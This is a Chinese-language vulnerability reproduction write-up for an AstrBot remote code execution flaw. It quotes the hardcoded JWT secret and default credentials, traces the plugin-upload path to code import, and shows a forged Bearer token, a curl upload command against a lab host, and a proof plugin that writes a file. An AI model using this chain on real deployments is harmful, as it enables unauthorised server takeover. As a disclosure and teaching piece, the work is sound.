AstrBot 远程代码执行(CVE-2025-55449)漏洞复现
AstrBot 是一个开源的一站式 Agent 聊天机器人平台及开发框架。
主要功能
- 大模型对话。支持接入多种大模型服务。支持多模态、工具调用、MCP、原生知识库、人设等功能。
- 多消息平台支持。支持接入 QQ、企业微信、微信公众号、飞书、Telegram、钉钉、Discord、KOOK 等平台。支持速率限制、白名单、百度内容审核。
- Agent。完善适配的 Agentic 能力。支持多轮工具调用、内置沙盒代码执行器、网页搜索等功能。
- 插件扩展。深度优化的插件机制,支持开发插件扩展功能,社区插件生态丰富。
- WebUI。可视化配置和管理机器人,功能齐全。
漏洞描述
近日,奇安信CERT监测到官方修复AstrBot 远程代码执行漏洞(CVE-2025-55449),该漏洞源于 AstrBot 使用了固定的 JWT 签名密钥,攻击者可利用该密钥伪造任意有效的 JWT 认证令牌,完全绕过身份验证机制。成功绕过认证后,攻击者可访问插件管理接口,通过上传恶意的 Python 插件文件实现远程代码执行。**目前该漏洞POC和技术细节已在互联网上公开,**鉴于该漏洞影响范围较大,建议客户尽快做好自查及防护。
影响版本
AstrBot < 3.5.18
我们这里使用 3.5.17来复现
漏洞分析
先看看源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
|
// astrbot/dashboard/routes/auth.py
import jwt
import datetime
import asyncio
from .route import Route, Response, RouteContext
from quart import request
from astrbot.core import WEBUI_SK, DEMO_MODE
from astrbot import logger
class AuthRoute(Route):
def __init__(self, context: RouteContext) -> None:
super().__init__(context)
self.routes = {
"/auth/login": ("POST", self.login),
"/auth/account/edit": ("POST", self.edit_account),
}
self.register_routes()
async def login(self):
username = self.config["dashboard"]["username"]
password = self.config["dashboard"]["password"]
post_data = await request.json
if post_data["username"] == username and post_data["password"] == password:
change_pwd_hint = False
if (
username == "astrbot"
and password == "77b90590a8945a7d36c963981a307dc9"
and not DEMO_MODE
):
change_pwd_hint = True
logger.warning("为了保证安全,请尽快修改默认密码。")
return (
Response()
.ok(
{
"token": self.generate_jwt(username),
"username": username,
"change_pwd_hint": change_pwd_hint,
}
)
.__dict__
)
else:
await asyncio.sleep(3)
return Response().error("用户名或密码错误").__dict__
async def edit_account(self):
if DEMO_MODE:
return (
Response()
.error("You are not permitted to do this operation in demo mode")
.__dict__
)
password = self.config["dashboard"]["password"]
post_data = await request.json
if post_data["password"] != password:
return Response().error("原密码错误").__dict__
new_pwd = post_data.get("new_password", None)
new_username = post_data.get("new_username", None)
if not new_pwd and not new_username:
return (
Response().error("新用户名和新密码不能同时为空,你改了个寂寞").__dict__
)
if new_pwd:
self.config["dashboard"]["password"] = new_pwd
if new_username:
self.config["dashboard"]["username"] = new_username
self.config.save_config()
return Response().ok(None, "修改成功").__dict__
def generate_jwt(self, username):
payload = {
"username": username,
"exp": datetime.datetime.utcnow() + datetime.timedelta(days=7),
}
token = jwt.encode(payload, WEBUI_SK, algorithm="HS256") # 漏洞点
return token
|
可以看到:
token = jwt.encode(payload, WEBUI_SK, algorithm=“HS256”)
这里使用了WEBUI_SK来加密生成jwt token
又from astrbot.core import WEBUI_SK, DEMO_MODE导入了WEBUI_SK,找找看,然后找到这里:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
|
// astrbot/core/__init__.py
import os
import asyncio
from .log import LogManager, LogBroker # noqa
from astrbot.core.utils.t2i.renderer import HtmlRenderer
from astrbot.core.utils.shared_preferences import SharedPreferences
from astrbot.core.utils.pip_installer import PipInstaller
from astrbot.core.db.sqlite import SQLiteDatabase
from astrbot.core.config.default import DB_PATH
from astrbot.core.config import AstrBotConfig
from astrbot.core.file_token_service import FileTokenService
from .utils.astrbot_path import get_astrbot_data_path
# 初始化数据存储文件夹
os.makedirs(get_astrbot_data_path(), exist_ok=True)
WEBUI_SK = "Advanced_System_for_Text_Response_and_Bot_Operations_Tool" #这里
DEMO_MODE = os.getenv("DEMO_MODE", False)
astrbot_config = AstrBotConfig()
t2i_base_url = astrbot_config.get("t2i_endpoint", "https://t2i.soulter.top/text2img")
html_renderer = HtmlRenderer(t2i_base_url)
logger = LogManager.GetLogger(log_name="astrbot")
db_helper = SQLiteDatabase(DB_PATH)
# 简单的偏好设置存储, 这里后续应该存储到数据库中, 一些部分可以存储到配置中
sp = SharedPreferences()
# 文件令牌服务
file_token_service = FileTokenService()
pip_installer = PipInstaller(
astrbot_config.get("pip_install_arg", ""),
astrbot_config.get("pypi_index_url", None),
)
web_chat_queue = asyncio.Queue(maxsize=32)
web_chat_back_queue = asyncio.Queue(maxsize=32)
|
可以看到这里硬编码了WEBUI_SK进去
看看token的验证逻辑:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
|
// astrbot/dashboard/server.py
async def srv_plug_route(self, subpath, *args, **kwargs):
"""
插件路由
"""
registered_web_apis = self.core_lifecycle.star_context.registered_web_apis
for api in registered_web_apis:
route, view_handler, methods, _ = api
if route == f"/{subpath}" and request.method in methods:
return await view_handler(*args, **kwargs)
return jsonify(Response().error("未找到该路由").__dict__)
async def auth_middleware(self):
if not request.path.startswith("/api"):
return
allowed_endpoints = ["/api/auth/login", "/api/file"]
if any(request.path.startswith(prefix) for prefix in allowed_endpoints):
return
# claim jwt
token = request.headers.get("Authorization")
if not token:
r = jsonify(Response().error("未授权").__dict__)
r.status_code = 401
return r
if token.startswith("Bearer "):
token = token[7:]
try:
payload = jwt.decode(token, WEBUI_SK, algorithms=["HS256"])
g.username = payload["username"]
except jwt.ExpiredSignatureError:
r = jsonify(Response().error("Token 过期").__dict__)
r.status_code = 401
return r
except jwt.InvalidTokenError:
r = jsonify(Response().error("Token 无效").__dict__)
r.status_code = 401
return r
|
只要能被解析且不过期的token都能过验证,这里可以伪造token来越权访问插件管理接口
看看怎么RCE:
由于应用自带插件扩展功能,允许用户上传自定义插件包,程序会进行解压后读取插件相关的信息并导入对象的Python文件执行代码。
在:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
// astrbot/dashboard/routes/plugin.py
class PluginRoute(Route):
def __init__(
self,
context: RouteContext,
core_lifecycle: AstrBotCoreLifecycle,
plugin_manager: PluginManager,
) -> None:
super().__init__(context)
self.routes = {
"/plugin/get": ("GET", self.get_plugins),
"/plugin/install": ("POST", self.install_plugin),
"/plugin/install-upload": ("POST", self.install_plugin_upload), # 这里
"/plugin/update": ("POST", self.update_plugin),
"/plugin/uninstall": ("POST", self.uninstall_plugin),
"/plugin/market_list": ("GET", self.get_online_plugins),
"/plugin/off": ("POST", self.off_plugin),
"/plugin/on": ("POST", self.on_plugin),
"/plugin/reload": ("POST", self.reload_plugins),
"/plugin/readme": ("GET", self.get_plugin_readme),
"/plugin/platform_enable/get": ("GET", self.get_plugin_platform_enable),
"/plugin/platform_enable/set": ("POST", self.set_plugin_platform_enable),
}
self.core_lifecycle = core_lifecycle
self.plugin_manager = plugin_manager
self.register_routes()
|
可以看到/plugin/install-upload映射到self.install_plugin_upload
然后一步步走
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
async def install_plugin_upload(self):
if DEMO_MODE:
return (
Response()
.error("You are not permitted to do this operation in demo mode")
.__dict__
)
try:
file = await request.files
file = file["file"]
logger.info(f"正在安装用户上传的插件 {file.filename}")
file_path = f"data/temp/{file.filename}"
await file.save(file_path)
plugin_info = await self.plugin_manager.install_plugin_from_file(file_path) #here
# self.core_lifecycle.restart()
logger.info(f"安装插件 {file.filename} 成功")
return Response().ok(plugin_info, "安装成功。").__dict__
except Exception as e:
logger.error(traceback.format_exc())
return Response().error(str(e)).__dict__
|
再进install_plugin_from_file函数看看
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
|
// astrbot/core/star/star_manager.py
async def install_plugin_from_file(self, zip_file_path: str):
dir_name = os.path.basename(zip_file_path).replace(".zip", "")
dir_name = dir_name.removesuffix("-master").removesuffix("-main").lower()
desti_dir = os.path.join(self.plugin_store_path, dir_name)
self.updator.unzip_file(zip_file_path, desti_dir)
# remove the zip
try:
os.remove(zip_file_path)
except BaseException as e:
logger.warning(f"删除插件压缩包失败: {e!s}")
# await self.reload()
await self.load(specified_dir_name=dir_name) # 这里
# Get the plugin metadata to return repo info
plugin = self.context.get_registered_star(dir_name)
if not plugin:
# Try to find by other name if directory name doesn't match plugin name
for star in self.context.get_all_stars():
if star.root_dir_name == dir_name:
plugin = star
break
# Extract README.md content if exists
readme_content = None
readme_path = os.path.join(desti_dir, "README.md")
if not os.path.exists(readme_path):
readme_path = os.path.join(desti_dir, "readme.md")
if os.path.exists(readme_path):
try:
with open(readme_path, encoding="utf-8") as f:
readme_content = f.read()
except Exception as e:
logger.warning(f"读取插件 {dir_name} 的 README.md 文件失败: {e!s}")
plugin_info = None
if plugin:
plugin_info = {
"repo": plugin.repo,
"readme": readme_content,
"name": plugin.name,
}
return plugin_info
|
我们看到有一个load,很熟悉,看看是不是我们想要的那个load
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
async def load(self, specified_module_path=None, specified_dir_name=None):
......
# 尝试导入模块
try:
module = __import__(path, fromlist=[module_str])
except (ModuleNotFoundError, ImportError):
# 尝试安装依赖
await self._check_plugin_dept_update(target_plugin=root_dir_name)
module = __import__(path, fromlist=[module_str])
except Exception as e:
logger.error(traceback.format_exc())
logger.error(f"插件 {root_dir_name} 导入失败。原因:{e!s}")
continue
......
|
在load里使用了__import__来导入自定义的插件代码文件
RCE链就串联起来了,PluginManager.install_plugin_from_file函数将上传的插件代码解压后交由load函数进行加载,结合jwt越权,导致恶意代码可能被执行。
漏洞复现
先写个插件,可以照模板写,找一个网上的:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
|
from astrbot.api.event import filter, AstrMessageEvent, MessageEventResult
from astrbot.api.star import Context, Star, register
from astrbot.api import logger
@register("helloworld", "YourName", "一个简单的 Hello World 插件", "1.0.0")
class MyPlugin(Star):
def __init__(self, context: Context):
super().__init__(context)
async def initialize(self):
with open('tmp/success', 'w') as f:
f.write('hacked!')
# 注册指令的装饰器。指令名为 helloworld。注册成功后,发送 `/helloworld` 就会触发这个指令,并回复 `你好, {user_name}!`
@filter.command("helloworld")
async def helloworld(self, event: AstrMessageEvent):
"""这是一个 hello world 指令""" # 这是 handler 的描述,将会被解析方便用户了解插件内容。建议填写。
user_name = event.get_sender_name()
message_str = event.message_str # 用户发的纯文本消息字符串
message_chain = event.get_messages() # 用户所发的消息的消息链 # from astrbot.api.message_components import *
logger.info(message_chain)
yield event.plain_result(f"Hello, {user_name}, 你发了 {message_str}!") # 发送一条纯文本消息
async def terminate(self):
"""可选择实现异步的插件销毁方法,当插件被卸载/停用时会调用。"""
|
带token上传zip:
1
2
3
4
5
6
|
┌──(kali㉿kali)-[~/astrbot]
└─$ curl -X POST \
-H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFzdHJib3QiLCJleHAiOjE3NjQzNzUxMTB9.Mz9_VTb1yWP8q061MF0wVHDMG04_Oz7bKT-xFHdB3MM" \
-F "file=@/home/kali/astrbot/helloworld-master.zip" \
http://192.168.142.131:6185/api/plugin/install-upload
{"status":"ok","message":"\u5b89\u88c5\u6210\u529f\u3002","data":{"repo":"https://github.com/Soulter/helloworld","readme":"# helloworld\n\nAstrBot \u63d2\u4ef6\u6a21\u677f\n\nA template plugin for AstrBot plugin feature\n\n# \u652f\u6301\n\n[\u5e2e\u52a9\u6587\u6863](https://astrbot.app)\n","name":"helloworld"}}
|
发现成功执行了命令:
1
2
3
|
┌──(kali㉿kali)-[~]
└─$ cat /tmp/success
hacked!
|
这里我测试的时候想弹shell但一直弹不到,在找poc的过程中发现了写内存马的方式,感觉蛮有启发意义的,不过这里就不写了
参考
【已复现】AstrBot 远程代码执行漏洞(CVE-2025-55449)安全风险通告
AstrBot 远程代码执行(CVE-2025-55449)漏洞分析
CVE-2025-55449